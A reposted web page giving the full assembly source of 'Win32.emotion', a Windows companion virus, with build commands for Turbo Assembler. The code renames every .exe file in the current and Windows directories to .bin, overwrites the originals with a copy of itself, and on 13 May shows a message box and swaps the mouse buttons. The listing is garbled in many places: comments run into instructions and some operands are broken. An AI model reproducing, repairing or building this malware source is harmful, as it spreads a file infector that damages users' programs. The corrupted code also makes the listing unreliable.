2. Tech
  3. Win32.emotion.asm

Win32.emotion.asm

xiaoxiao2021-03-05  23

Comment *

Win32.emotion 苒 苒? 苒 苒? 苒? Disassembly by?????? DARKMAN / 29A 苘苒 圻 咣 咣 圹? 圹? 苘 苘? 苘苘 苘苘 圹??? 圹? 圹???

Win32.emotion is a 4608 bytes Direct Action Companion Exe Virus. Infects

Every File In Current Directory and Windows Directory, When Executed, by

Moving the Original Exe File to a bin file by the Same name and overwriting

The Original Exe File with The Virus.

Compile Win32.emotion with Turbo Assembler V 5.0 by Typing:

Tasm32 / m / ml emotion.asm

TLINK32-TPE -X -AA EMOTION.OBJ,, IMPORT32

Vgalign Emotion.exe

Pewrsec emotion.exe

*

Jumps

Locals

.386

.MODEL FLAT

Kernel32.dll

EXTRN EXITPROCESS: PROC

EXTRN GETMODULEHANDLEA: PROC

EXTRN FINDNEXTFILEA: PROC

EXTRN GETCOMMANDLINEA: PROC

EXTRN FINDFIRSTFILEA: PROC

EXTRN COPYFILEA: PROC

EXTRN GETSYSTEMTIME: Proc

EXTRN GETWINDOWSDIRECTORYA: PROC

EXTRN MOVEFILEA: PROC

EXTRN SETCURRENTDIRECTORYA: PROC

EXTRN WINEXEC: PROC

EXTRN GETMODULEFILENAMEA: PROC

User32.dll

EXTRN SWAPMOUSEBUTTON: PROC

EXTRN Messageboxa: Proc

.DATA

Max_path EQU 104H

Null EQU 00H

True EQU 01H

MB_ICONHAND EQU 10h; A Stop-Sign Icon APPEARS IN THE

; Message Box

SW_SHOWNORMAL EQU 01H; Activates and Displays A Window

INVALID_HANDLE_VALUE EQU -01H

False Equ 00H

SystemTime Struct

Wyear Word?; Specifies the Current Year

WMONTH WORD MONTH; Specifier the Current Month;

; January = 1, February = 2, And So Onwdayofweek Word?; Specifies The Current Day of The

WEEK

WDAY WORD?; Specifier the Current Day of the

Month

WHOR WORD?; Specifier the Current Hour

Wminute Word?; Specifies the Current Minute

WSecond Word?; Specifies The Current Second

WMILLISECONDS WORDS; Specifies The Current MilliseCond

ENDS

Filetime Struct

DWLOWDATETIME DWORD?; Specifies The Low-Order 32 BITS OF

; the file time

DWHIGHDATETIME DWORD?; Specifies the High-Order 32 Bits of

; the file time

Filetime Ends

Win32_find_data struct

DWFileAttributes DWORD?; Specifies the file attributes of there

File Found

FtcreationTime FileTime <>; specifies the time the file was

CREATED

FTLASTACCESSTIME FileTime <>; Specifies the Time That The File WAS

Last Accessed

FTLASTWRITETIME FileTime <>; specifies the time That the File WAS

Last Written TO

NFILESIZEHIGH DWORD?; Specifies the High-Order DWord Value

; of the file size, in Bytes

NFILESZELOW DWORD?; Specifier the low-Order DWord Value

; of the file size, in Bytes

DWRESERVED0 DWORD?; Reserved for Future Use

DWRESERVED1 DWORD?; Reserved for Future Use

CFILENAME BYTE MAX_PATH DUP (?)

A null-terminated string That Is The

Name of the file

Calternate Byte 0EH DUP (?); a null-terminated string That is an

ALTERNATIVE NAME for the File

ENDS

DB?

.code

Code_begin:

Push Null; Get Module Handle of Kernel32.dllcall getModuleHandlea

Push max_path; size of buffer, in character

Push Offset CFileName; Pointer to Buffer for Module Path

Push Eax; Handle to Module To Find FileName

; For

Call getModuleFileNamea

JMP _FindFirstFilea

_GetWindowsDirectorya:

Push max_path; size of directory buffer

Push Offset CBuffer; Address of Buffer for Windows

Directory

Call GetWindowsDirectorya

Push Offset Szcurdir; Address of Name of New Current

Directory

Call setCurrentDirectorya

MOV [set_current_directory], TRUE

JMP _FindFirstFilea

_GetCommandlinea:

Call getcommandlinea

Mov ESI, ESI ESI = Pointer to THE Command-Line

; String for the current process

Lea Edi, Szcmdline; EDI = Pointer to Szcmdline

Move_commandline_loop:

StoSB; Store A Byte of Command-Line

Lodsb; al = a byte of command-line

OR Al, Al; End of Command-Line?

JNZ MOVE_COMMANDLINE_LOOP; NOT ZERO? JUMP TO

Move_commandline_loop

MOV EAX, '.'; DOT

Lea Edi, Szcmdline; EDI = Pointer to Szcmdline

MOV ECX, Max_Path; ECX = Size of Directory Buffer

Repne scaSB; Find the dot in the filename

MOV DWORD PTR [EDI], 'NIB'; Change The Extens Of The FileName

t .bin

MOV Word PTR [Szcmdline], ''

Push Offset SystemTime; Address of System Time Structure

Call getSystemTime

CMP Byte Ptr [SystemTime.wmonth], 05H

JNE _WINEXEC; May? Jump to _winexecmp byte PTR [SystemTime.wday], 0DH

JNE _WINEXEC; 13th of May? Jump to _winexec

Push MB_ICONHAND; A Stop-Sign Icon APPEARS IN THE

; Message Box

Push Offset Szcaption; Address of Title of Message Box

Push Offset Sztext; Address of Text In Message Box

Push Null; Message Box Has No Owner Window

Call Messageboxa

Push True; Reverse Buttons

Call swapmousebutton

_Winexec:

Push sw_shownormal; activates and displays a window

Push Offset Szcmdline; Address of Command-Line

Call Winexec

Push 00h; EXIT CODE for All Threads

Call EXITPROCESS

_Findfirstfilea:

Push Offset FindFileData; Address of Returned Information

Push Offset SzFileName; Address of Name of File to Search

; For

Call FindfirstFilea

CMP EAX, INVALID_HANDLE_VALUE

JE FUNCTION_FAILED; function failed? Jump to

Function_failed

Lea Edi, FindfileData; EDI = Pointer to FindFileData

Lea ESI, [EDI CFILENAME-WIN32_FIND_DATA]

Push Eax; Eax = Search Handle

JMP Move_FileName

_FindNextFilea:

Push EDI; EDI = Pointer to FindFileData

Lea EDI, [EDI CFileName-Win32_Find_Data]

Mov ECX, 0DH; Store Thirteen Zeros

XOR Al, Al; ZERO AL

Rep Stosb; Store Zero

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

Mov ECX, 0DH; Store Thirteen Zeros

XOR Al, Al; ZERO AL

Rep Stosb; Store Zeropop Edi; EDI = Pointer to FindfileData

POP Eax; Eax = Search Handle

Push Eax; Eax = Search Handle

Push EDI; Address of Structure for Data on

Found file

Push Eax; Handle of Search

Call FindnextFilea

OR EAX, EAX; FUNCTION FAILED?

JZ Function_Failed; ZERO? Jump to Function_Failed

Lea Edi, FindfileData; EDI = Pointer to FindFileData

Lea ESI, [EDI CFILENAME-WIN32_FIND_DATA]

JMP Move_FileName

Function_failed:

CMP [SET_CURRENT_DIRECTORY], TRUE

JE _GETCOMMANDLINEA; Equal? ​​Jump to _Getcommandlinea

JMP _GetWindowsDirectorya

Move_filename:

Push EDI; EDI = Pointer to FindFileData

Lea Si, [EDI CFILENAME-WIN32_FIND_DATA]

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

Move_filename_loop:

Lodsb; al = a byte of command-line

StoSB; Store A Byte of Command-Line

OR Al, Al; End of Command-Line?

JNZ Move_FileName_Loop; Not Zero? Jump to Move_FileName_LOOP

XOR Eax, Eax; Zero EAX

Lea Edi, SznewFileName; EDI = Pointer to SznewFileName

MOV ECX, 41H; Search THROUGH SIXTY-FIVE Characters

Repne scaSB; Find end of filename

MOV DWORD PTR [EDI-04H], 'NIB'

POP EDI; EDI = Pointer to FindFileData

Push Offset SznewFileName; Address of New Name for the file

Lea Eax, [EDI CFILENAME-WIN32_FIND_DATA] Push Eax; Address of Name of the EXISTING FILE

Call Movefilea

Push false; if file already exists, Overwrite IT

Lea Eax, [EDI CFILENAME-WIN32_FIND_DATA]

Push Eax; Address of FileName to Copy To

Lea Eax, SzexistingFileName; Eax = Pointer to SzexistingFileName

Push Eax; Address of Name of an existing file

Call Copyfilea

JMP _FindNextFilea

Code_end:

SZFileName DB '* .exe', 00H; Name of File to Search for

SZCAPTION DB 'W32.EMOTION - by: Techno PHUNK [TI]', 00H

Sztext db 'a pool of emotions, beaten and abused.', 0DH, 0AH

DB 'WHO WILL SWIM IN THE Store Waters? Not a one', 0DH, 0AH

DB 'But Many Will Scoff and Destroy this pool with apathy', 00H

Szcurdir:

CBuffer DB MAX_PATH DUP (00h)

; Buffer for Windows Directory

SZNewFileName DB MAX_PATH DUP (00h)

New name for the file

SzexistingFileName:

Szcmdline:

CFileName DB MAX_PATH DUP (00h)

Buffer for module path

SystemTime SystemTime <>

SET_CURRENT_DIRECTORY DB FALSE

FindFileData Win32_Find_Data <>

Data_end:

End code_begin

转载请注明原文地址:https://www.9cbs.com/read-37448.html

9cbs

New Post(0)